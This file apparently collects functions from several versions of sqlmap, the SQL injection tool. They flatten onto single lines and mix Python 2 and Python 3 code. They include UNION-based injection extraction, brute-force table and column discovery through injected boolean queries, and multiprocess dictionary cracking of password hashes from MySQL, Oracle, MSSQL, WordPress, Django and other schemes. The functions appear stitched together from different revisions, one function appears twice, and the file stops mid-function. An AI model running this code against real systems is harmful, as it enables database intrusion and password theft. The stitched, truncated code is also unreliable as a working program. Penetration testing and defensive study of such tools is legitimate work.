def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist): if IS_WIN: coloramainit() count = 0 rotator = 0 hashes = set([item[0][1] for item in attack_info]) wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) try: for word in wordlist: if not attack_info: break if not isinstance(word, basestring): continue if suffix: word = word + suffix try: current = __functions__[hash_regex](password=word, uppercase=False) count += 1 if current in hashes: for item in attack_info[:]: ((user, hash_), _) = item if hash_ == current: retVal.put((user, hash_, word)) clearConsoleLine() infoMsg = "\r[%s] [INFO] cracked password '%s'" % ( time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'\n" % user else: infoMsg += " for hash '%s'\n" % hash_ dataToStdout(infoMsg, True) attack_info.remove(item) elif ( proc_id == 0 or getattr(proc_count, "value", 0) == 1 ) and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 status = 'current status: %s... %s' % ( word.ljust(5)[:5], ROTATING_CHARS[rotator]) if not hasattr(conf, "api"): dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise except (UnicodeEncodeError, UnicodeDecodeError): pass # ignore possible encoding problems caused by some words in custom dictionaries except Exception, e: warnMsg = "there was a problem while hashing entry: %s (%s). " % ( repr(word), e) warnMsg += "Please report by e-mail to '*****@*****.**'" logger.critical(warnMsg) except KeyboardInterrupt: pass finally: if hasattr(proc_count, "value"): with proc_count.get_lock(): proc_count.value -= 1
def tableExists(tableFile, regex=None): tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS), unique=True) retVal = [] infoMsg = "checking table existence using items from '%s'" % tableFile logger.info(infoMsg) infoMsg = "adding words used on web page to the check list" logger.info(infoMsg) pageWords = getPageTextWordsSet(kb.originalPage) for word in pageWords: word = word.lower() if len(word) > 2 and not word[0].isdigit() and word not in tables: tables.append(word) tables = filterListValue(tables, regex) count = [0] length = len(tables) threads = [] items = set() tbllock = threading.Lock() iolock = threading.Lock() kb.threadContinue = True kb.bruteMode = True def tableExistsThread(): while count[0] < length and kb.threadContinue: tbllock.acquire() table = safeSQLIdentificatorNaming(tables[count[0]]) count[0] += 1 tbllock.release() if conf.db and not conf.db.endswith(METADB_SUFFIX): fullTableName = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) else: fullTableName = table result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), fullTableName))) iolock.acquire() if result and table.lower() not in items: retVal.append(table) items.add(table.lower()) dataToSessionFile("[%s][%s][%s][TABLE_EXISTS][%s]\n" % (conf.url,\ kb.injection.place, safeFormatString(conf.parameters[kb.injection.place]),\ safeFormatString(fullTableName))) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "\r[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), table) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % (count[0], length, round(100.0*count[0]/length), '%') dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) iolock.release() if conf.threads > 1: infoMsg = "starting %d threads" % conf.threads logger.info(infoMsg) else: message = "please enter number of threads? [Enter for %d (current)] " % conf.threads choice = readInput(message, default=str(conf.threads)) if choice and choice.isdigit(): conf.threads = int(choice) if conf.threads == 1: warnMsg = "running in a single-thread mode. This could take a while." logger.warn(warnMsg) # Start the threads for numThread in range(conf.threads): thread = threading.Thread(target=tableExistsThread, name=str(numThread)) thread.start() threads.append(thread) # And wait for them to all finish try: alive = True while alive: alive = False for thread in threads: if thread.isAlive(): alive = True thread.join(5) except KeyboardInterrupt: kb.threadContinue = False kb.threadException = True print logger.debug("waiting for threads to finish") warnMsg = "user aborted during common table existence check. " warnMsg += "sqlmap will display some tables only" logger.warn(warnMsg) try: while (threading.activeCount() > 1): pass except KeyboardInterrupt: raise sqlmapThreadException, "user aborted" finally: kb.bruteMode = False kb.threadContinue = True kb.threadException = False clearConsoleLine(True) dataToStdout("\n") if not retVal: warnMsg = "no table found" logger.warn(warnMsg) else: for item in retVal: if not kb.data.cachedTables.has_key(conf.db): kb.data.cachedTables[conf.db] = [item] else: kb.data.cachedTables[conf.db].append(item) return kb.data.cachedTables
def dictionaryAttack(attack_dict): suffix_list = [""] custom_wordlist = [""] hash_regexes = [] results = [] resumes = [] user_hash = [] processException = False foundHash = False for (_, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ regex = hashRecognition(hash_) if regex and regex not in hash_regexes: hash_regexes.append(regex) infoMsg = "using hash method '%s'" % __functions__[ regex].func_name logger.info(infoMsg) for hash_regex in hash_regexes: keys = set() attack_info = [] for (user, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue foundHash = True hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ if re.match(hash_regex, hash_): item = None if hash_regex not in (HASH.CRYPT_GENERIC, HASH.WORDPRESS): hash_ = hash_.lower() if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): item = [(user, hash_), {}] elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): item = [(user, hash_), {'username': user}] elif hash_regex in (HASH.ORACLE, ): item = [(user, hash_), {'salt': hash_[-20:]}] elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): item = [(user, hash_), {'salt': hash_[6:14]}] elif hash_regex in (HASH.CRYPT_GENERIC, ): item = [(user, hash_), {'salt': hash_[0:2]}] elif hash_regex in (HASH.WORDPRESS, ): if ITOA64.index(hash_[3]) < 32: item = [(user, hash_), { 'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12] }] else: warnMsg = "invalid hash '%s'" % hash_ logger.warn(warnMsg) if item and hash_ not in keys: resumed = hashDBRetrieve(hash_) if not resumed: attack_info.append(item) user_hash.append(item[0]) else: infoMsg = "resuming password '%s' for hash '%s'" % ( resumed, hash_) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'" % user logger.info(infoMsg) resumes.append((user, hash_, resumed)) keys.add(hash_) if not attack_info: continue if not kb.wordlists: while not kb.wordlists: # the slowest of all methods hence smaller default dict if hash_regex in (HASH.ORACLE_OLD, HASH.WORDPRESS): dictPaths = [paths.SMALL_DICT] else: dictPaths = [paths.WORDLIST] message = "what dictionary do you want to use?\n" message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[ 0] message += "[2] custom dictionary file\n" message += "[3] file with list of dictionary files" choice = readInput(message, default="1") try: if choice == "2": message = "what's the custom dictionary's location?\n" dictPaths = [readInput(message)] logger.info("using custom dictionary") elif choice == "3": message = "what's the list file location?\n" listPath = readInput(message) checkFile(listPath) dictPaths = getFileItems(listPath) logger.info("using custom list of dictionaries") else: logger.info("using default dictionary") dictPaths = filter(None, dictPaths) for dictPath in dictPaths: checkFile(dictPath) kb.wordlists = dictPaths except Exception, ex: warnMsg = "there was a problem while loading dictionaries" warnMsg += " ('%s')" % getSafeExString(ex) logger.critical(warnMsg) message = "do you want to use common password suffixes? (slow!) [y/N] " test = readInput(message, default="N") if test[0] in ("y", "Y"): suffix_list += COMMON_PASSWORD_SUFFIXES infoMsg = "starting dictionary-based cracking (%s)" % __functions__[ hash_regex].func_name logger.info(infoMsg) for item in attack_info: ((user, _), _) = item if user and not user.startswith(DUMMY_USER_PREFIX): custom_wordlist.append(normalizeUnicode(user)) if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): for suffix in suffix_list: if not attack_info or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count( ) singleTimeLogMessage(infoMsg) gc.disable() retVal = _multiprocessing.Queue() count = _multiprocessing.Value( 'i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): p = _multiprocessing.Process( target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist)) processes.append(p) for p in processes: p.daemon = True p.start() while count.value > 0: time.sleep(0.5) else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) retVal = Queue() _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist) except KeyboardInterrupt: print processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except (OSError, AttributeError): pass finally: if _multiprocessing: gc.enable() if retVal: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) attack_info = filter( lambda _: _[0][0] != user or _[0][1] != hash_, attack_info) hashDBWrite(hash_, word) results.append(item) conf.hashDB.endTransaction() clearConsoleLine() else: for ((user, hash_), kwargs) in attack_info: if processException: break if any(_[0] == user and _[1] == hash_ for _ in results): continue count = 0 found = False for suffix in suffix_list: if found or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count( ) singleTimeLogMessage(infoMsg) gc.disable() retVal = _multiprocessing.Queue() found_ = _multiprocessing.Value('i', False) count = _multiprocessing.Value( 'i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): p = _multiprocessing.Process( target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist)) processes.append(p) for p in processes: p.daemon = True p.start() while count.value > 0: time.sleep(0.5) found = found_.value != 0 else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) class Value(): pass retVal = Queue() found_ = Value() found_.value = False _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist) found = found_.value except KeyboardInterrupt: print processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except (OSError, AttributeError): pass finally: if _multiprocessing: gc.enable() if retVal: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get( block=False) hashDBWrite(hash_, word) results.append(item) conf.hashDB.endTransaction() clearConsoleLine()
def unionUse(expression, unpack=True, dump=False): """ This function tests for an union SQL injection on the target URL then call its subsidiary function to effectively perform an union SQL injection on the affected URL """ initTechnique(PAYLOAD.TECHNIQUE.UNION) abortedFlag = False count = None origExpr = expression startLimit = 0 stopLimit = None value = None width = getConsoleWidth() start = time.time() _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields( origExpr) # Set kb.partRun in case the engine is called from the API kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None if expressionFieldsList and len( expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): # Removed ORDER BY clause because UNION does not play well with it expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) debugMsg = "stripping ORDER BY clause from statement because " debugMsg += "it does not play well with UNION query SQL injection" singleTimeDebugMessage(debugMsg) # We have to check if the SQL query might return multiple entries # if the technique is partial UNION query and in such case forge the # SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \ " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \ and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ and not re.search(SQL_SCALAR_REGEX, expression, re.I)\ or kb.forcePartialUnion: expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition( expression, dump) if limitCond: # Count the number of SQL query entries output countedExpression = expression.replace( expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] output = _oneShotUnionUse(countedExpression, unpack) count = unArrayizeValue(parseUnionPage(output)) if isNumPosStrValue(count): if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: stopLimit = int(count) infoMsg = "the SQL query used returns " infoMsg += "%d entries" % stopLimit logger.info(infoMsg) elif count and (not isinstance(count, basestring) or not count.isdigit()): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) else: value = [] # for empty tables return value threadData = getCurrentThreadData() threadData.shared.limits = iter(xrange(startLimit, stopLimit)) numThreads = min(conf.threads, (stopLimit - startLimit)) threadData.shared.value = BigArray() threadData.shared.buffered = [] threadData.shared.counter = 0 threadData.shared.lastFlushed = startLimit - 1 threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 if threadData.shared.showEta: threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. It might take too long" logger.debug(debugMsg) try: def unionThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: try: valueStart = time.time() threadData.shared.counter += 1 num = threadData.shared.limits.next() except StopIteration: break if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): field = expressionFieldsList[0] elif Backend.isDbms(DBMS.ORACLE): field = expressionFieldsList else: field = None limitedExpr = agent.limitQuery(num, expression, field) output = _oneShotUnionUse(limitedExpr, unpack, True) if not kb.threadContinue: break if output: if all( map(lambda _: _ in output, (kb.chars.start, kb.chars.stop))): items = parseUnionPage(output) with kb.locks.value: if threadData.shared.showEta: threadData.shared.progress.progress( time.time() - valueStart, threadData.shared.counter) # in case that we requested N columns and we get M!=N then we have to filter a bit if isListLike( items) and len(items) > 1 and len( expressionFieldsList) > 1: items = [ item for item in items if isListLike(item) and len(item) == len(expressionFieldsList) ] index = None for index in xrange( len(threadData.shared.buffered)): if threadData.shared.buffered[index][ 0] >= num: break threadData.shared.buffered.insert( index or 0, (num, items)) while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[ 0][0]: threadData.shared.lastFlushed += 1 _ = threadData.shared.buffered[0][1] if not isNoneValue(_): threadData.shared.value.extend( arrayizeValue(_)) del threadData.shared.buffered[0] else: with kb.locks.value: index = None if threadData.shared.showEta: threadData.shared.progress.progress( time.time() - valueStart, threadData.shared.counter) for index in xrange( len(threadData.shared.buffered)): if threadData.shared.buffered[index][ 0] >= num: break threadData.shared.buffered.insert( index or 0, (num, None)) items = output.replace( kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) if conf.verbose == 1 and not ( threadData.resumed and kb.suppressResumeInfo ) and not threadData.shared.showEta: status = "[%s] [INFO] %s: %s" % ( time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join( "\"%s\"" % _ for _ in flattenValue( arrayizeValue(items))))) if len(status) > width: status = "%s..." % status[:width - 3] dataToStdout("%s\r\n" % status, True) runThreads(numThreads, unionThread) if conf.verbose == 1: clearConsoleLine(True) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) finally: for _ in sorted(threadData.shared.buffered): if not isNoneValue(_[1]): threadData.shared.value.extend(arrayizeValue(_[1])) value = threadData.shared.value kb.suppressResumeInfo = False if not value and not abortedFlag: output = _oneShotUnionUse(expression, unpack) value = parseUnionPage(output) duration = calculateDeltaSeconds(start) if not kb.bruteMode: debugMsg = "performed %d queries in %.2f seconds" % ( kb.counters[PAYLOAD.TECHNIQUE.UNION], duration) logger.debug(debugMsg) return value
def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist, api): if IS_WIN: coloramainit() count = 0 rotator = 0 wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) try: for word in wordlist: if found.value: break count += 1 if isinstance(word, six.binary_type): word = getUnicode(word) elif not isinstance(word, six.string_types): continue if suffix: word = word + suffix try: current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) if hash_ == current: if hash_regex == HASH.ORACLE_OLD: # only for cosmetic purposes word = word.upper() retVal.put((user, hash_, word)) clearConsoleLine() infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'\n" % user else: infoMsg += " for hash '%s'\n" % hash_ dataToStdout(infoMsg, True) found.value = True elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 status = "current status: %s... %s" % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) if user and not user.startswith(DUMMY_USER_PREFIX): status += " (user: %s)" % user if not api: dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise except (UnicodeEncodeError, UnicodeDecodeError): pass # ignore possible encoding problems caused by some words in custom dictionaries except Exception as ex: warnMsg = "there was a problem while hashing entry: %s ('%s'). " % (repr(word), getSafeExString(ex)) warnMsg += "Please report by e-mail to '%s'" % DEV_EMAIL_ADDRESS logger.critical(warnMsg) except KeyboardInterrupt: pass finally: if hasattr(proc_count, "value"): with proc_count.get_lock(): proc_count.value -= 1
def columnExists(columnFile, regex=None): if not conf.tbl: errMsg = "missing table parameter" raise SqlmapMissingMandatoryOptionException, errMsg result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) if result: errMsg = "can't use column existence check because of detected invalid results " errMsg += "(most probably caused by inability of the used injection " errMsg += "to distinguish errornous results)" raise SqlmapDataException, errMsg infoMsg = "checking column existence using items from '%s'" % columnFile logger.info(infoMsg) columns = getFileItems(columnFile, unique=True) columns.extend(_addPageTextWords()) columns = filterListValue(columns, regex) table = safeSQLIdentificatorNaming(conf.tbl, True) if conf.db and METADB_SUFFIX not in conf.db: table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) kb.threadContinue = True kb.bruteMode = True threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(columns) threadData.shared.outputs = [] def columnExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) kb.locks.io.acquire() if result: threadData.shared.outputs.append(column) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), column) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % (threadData.shared.count, threadData.shared.limit, round(100.0*threadData.shared.count/threadData.shared.limit), '%') dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, columnExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during column existence " warnMsg += "check. sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.outputs: warnMsg = "no column(s) found" logger.warn(warnMsg) else: columns = {} for column in threadData.shared.outputs: result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) if result: columns[column] = 'numeric' else: columns[column] = 'non-numeric' kb.data.cachedColumns[conf.db] = {conf.tbl: columns} for _ in map(lambda x: (conf.db, conf.tbl, x[0], x[1]), columns.items()): if _ not in kb.brute.columns: kb.brute.columns.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) return kb.data.cachedColumns
def dictionaryAttack(attack_dict): suffix_list = [""] custom_wordlist = [""] hash_regexes = [] results = [] resumes = [] user_hash = [] processException = False foundHash = False for (_, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ regex = hashRecognition(hash_) if regex and regex not in hash_regexes: hash_regexes.append(regex) infoMsg = "using hash method '%s'" % __functions__[regex].__name__ logger.info(infoMsg) for hash_regex in hash_regexes: keys = set() attack_info = [] for (user, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue foundHash = True hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ if re.match(hash_regex, hash_): try: item = None if hash_regex not in (HASH.CRYPT_GENERIC, HASH.JOOMLA, HASH.WORDPRESS, HASH.UNIX_MD5_CRYPT, HASH.APACHE_MD5_CRYPT, HASH.APACHE_SHA1, HASH.VBULLETIN, HASH.VBULLETIN_OLD, HASH.SSHA, HASH.SSHA256, HASH.SSHA512, HASH.DJANGO_MD5, HASH.DJANGO_SHA1, HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): hash_ = hash_.lower() if hash_regex in (HASH.MD5_BASE64, HASH.SHA1_BASE64, HASH.SHA256_BASE64, HASH.SHA512_BASE64): item = [(user, encodeHex(decodeBase64(hash_, binary=True))), {}] elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1): item = [(user, hash_), {}] elif hash_regex in (HASH.SSHA,): item = [(user, hash_), {"salt": decodeBase64(hash_, binary=True)[20:]}] elif hash_regex in (HASH.SSHA256,): item = [(user, hash_), {"salt": decodeBase64(hash_, binary=True)[32:]}] elif hash_regex in (HASH.SSHA512,): item = [(user, hash_), {"salt": decodeBase64(hash_, binary=True)[64:]}] elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): item = [(user, hash_), {'username': user}] elif hash_regex in (HASH.ORACLE,): item = [(user, hash_), {"salt": hash_[-20:]}] elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): item = [(user, hash_), {"salt": hash_[6:14]}] elif hash_regex in (HASH.CRYPT_GENERIC,): item = [(user, hash_), {"salt": hash_[0:2]}] elif hash_regex in (HASH.UNIX_MD5_CRYPT, HASH.APACHE_MD5_CRYPT): item = [(user, hash_), {"salt": hash_.split('$')[2], "magic": "$%s$" % hash_.split('$')[1]}] elif hash_regex in (HASH.JOOMLA, HASH.VBULLETIN, HASH.VBULLETIN_OLD): item = [(user, hash_), {"salt": hash_.split(':')[-1]}] elif hash_regex in (HASH.DJANGO_MD5, HASH.DJANGO_SHA1): item = [(user, hash_), {"salt": hash_.split('$')[1]}] elif hash_regex in (HASH.WORDPRESS,): if ITOA64.index(hash_[3]) < 32: item = [(user, hash_), {"salt": hash_[4:12], "count": 1 << ITOA64.index(hash_[3]), "prefix": hash_[:12]}] else: warnMsg = "invalid hash '%s'" % hash_ logger.warn(warnMsg) if item and hash_ not in keys: resumed = hashDBRetrieve(hash_) if not resumed: attack_info.append(item) user_hash.append(item[0]) else: infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'" % user logger.info(infoMsg) resumes.append((user, hash_, resumed)) keys.add(hash_) except (binascii.Error, IndexError): pass if not attack_info: continue if not kb.wordlists: while not kb.wordlists: # the slowest of all methods hence smaller default dict if hash_regex in (HASH.ORACLE_OLD,): dictPaths = [paths.SMALL_DICT] else: dictPaths = [paths.WORDLIST] message = "what dictionary do you want to use?\n" message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0] message += "[2] custom dictionary file\n" message += "[3] file with list of dictionary files" choice = readInput(message, default='1') try: if choice == '2': message = "what's the custom dictionary's location?\n" dictPath = readInput(message) if dictPath: dictPaths = [dictPath] logger.info("using custom dictionary") elif choice == '3': message = "what's the list file location?\n" listPath = readInput(message) checkFile(listPath) dictPaths = getFileItems(listPath) logger.info("using custom list of dictionaries") else: logger.info("using default dictionary") dictPaths = [_ for _ in dictPaths if _] for dictPath in dictPaths: checkFile(dictPath) if os.path.splitext(dictPath)[1].lower() == ".zip": _ = zipfile.ZipFile(dictPath, 'r') if len(_.namelist()) == 0: errMsg = "no file(s) inside '%s'" % dictPath raise SqlmapDataException(errMsg) else: _.open(_.namelist()[0]) kb.wordlists = dictPaths except Exception as ex: warnMsg = "there was a problem while loading dictionaries" warnMsg += " ('%s')" % getSafeExString(ex) logger.critical(warnMsg) message = "do you want to use common password suffixes? (slow!) [y/N] " if readInput(message, default='N', boolean=True): suffix_list += COMMON_PASSWORD_SUFFIXES infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].__name__ logger.info(infoMsg) for item in attack_info: ((user, _), _) = item if user and not user.startswith(DUMMY_USER_PREFIX): custom_wordlist.append(normalizeUnicode(user)) # Algorithms without extra arguments (e.g. salt and/or username) if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC, HASH.SHA224_GENERIC, HASH.SHA256_GENERIC, HASH.SHA384_GENERIC, HASH.SHA512_GENERIC, HASH.APACHE_SHA1, HASH.VBULLETIN, HASH.VBULLETIN_OLD): for suffix in suffix_list: if not attack_info or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) gc.disable() retVal = _multiprocessing.Queue() count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): process = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist, conf.api)) processes.append(process) for process in processes: process.daemon = True process.start() while count.value > 0: time.sleep(0.5) else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) retVal = _queue.Queue() _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist, conf.api) except KeyboardInterrupt: print() processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except (OSError, AttributeError): pass finally: if _multiprocessing: gc.enable() if retVal: if conf.hashDB: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) attack_info = [_ for _ in attack_info if _[0][0] != user or _[0][1] != hash_] hashDBWrite(hash_, word) results.append(item) if conf.hashDB: conf.hashDB.endTransaction() clearConsoleLine() else: for ((user, hash_), kwargs) in attack_info: if processException: break if any(_[0] == user and _[1] == hash_ for _ in results): continue count = 0 found = False for suffix in suffix_list: if found or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) gc.disable() retVal = _multiprocessing.Queue() found_ = _multiprocessing.Value('i', False) count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): process = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist, conf.api)) processes.append(process) for process in processes: process.daemon = True process.start() while count.value > 0: time.sleep(0.5) found = found_.value != 0 else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) class Value(): pass retVal = _queue.Queue() found_ = Value() found_.value = False _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist, conf.api) found = found_.value except KeyboardInterrupt: print() processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except (OSError, AttributeError): pass finally: if _multiprocessing: gc.enable() if retVal and conf.hashDB: if conf.hashDB: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) hashDBWrite(hash_, word) results.append(item) if conf.hashDB: conf.hashDB.endTransaction() clearConsoleLine() results.extend(resumes) if foundHash and len(hash_regexes) == 0: warnMsg = "unknown hash format" 